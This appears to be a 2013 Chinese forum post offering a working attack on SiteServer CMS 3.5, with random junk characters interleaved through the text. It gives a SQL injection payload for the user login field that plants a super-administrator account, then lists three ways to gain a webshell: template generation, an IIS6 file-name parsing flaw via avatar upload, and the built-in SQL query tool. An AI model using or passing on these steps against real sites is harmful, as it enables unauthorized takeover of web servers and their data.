经测试秒杀最新的3.5版5 \7 ~1 X+ j3 Z# I: G' Z( K
stieserver官网:www.siteserver.cn# @3 z: O- S8 c2 A( w
EXP:
5 y! e5 V% r% P- I' e5 s+ \直接访问UserCenter/login.aspx7 V% `+ j4 ], o* F# h
用户名处输入:
* k' T8 M1 k; @+ o6 s/ s! I8 L
" o) H# Z/ T6 h123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
" Q4 ~) `5 E* _密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
* ?$ T: A. r' r, x+ |, x之后再访问后台SiteServer/login.aspx用插入的用户登陆
) n' Z1 ^+ g3 i. e- g$ }' g后台拿webshell的三种方法:; c$ k' \! t. q" Q
一、" S% r/ b# i! `5 I- R: S
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
. f; i) \6 Q( A. O+ B二、
0 [; {: V) k2 ~# |9 o T1 J) z成员权限-》添加用户-》用户名为:1.asp
g2 A7 `3 a) Q' Y) khttp://127.0.0.1/usercenter/# @% \% f7 T6 G0 U4 q, ^1 ~$ {
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell8 {4 R* J, X- L! h2 r
(ps:后台添加用户时不会验证是否含有非法字符)
l+ J' C+ A+ D; k8 P6 d) `三、$ t) H9 O) d# p% j O% a
系统工具-》实用工具-》机器参数查看
0 g2 p" b: s4 T2 Y/ v可以看到数据库类型、名称,WEB路径0 `! m; B, K w7 x- {% f# ]8 ~; a
系统工具-》数据库工具-》SQL语句查询
( b9 U9 q( H. B$ N这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对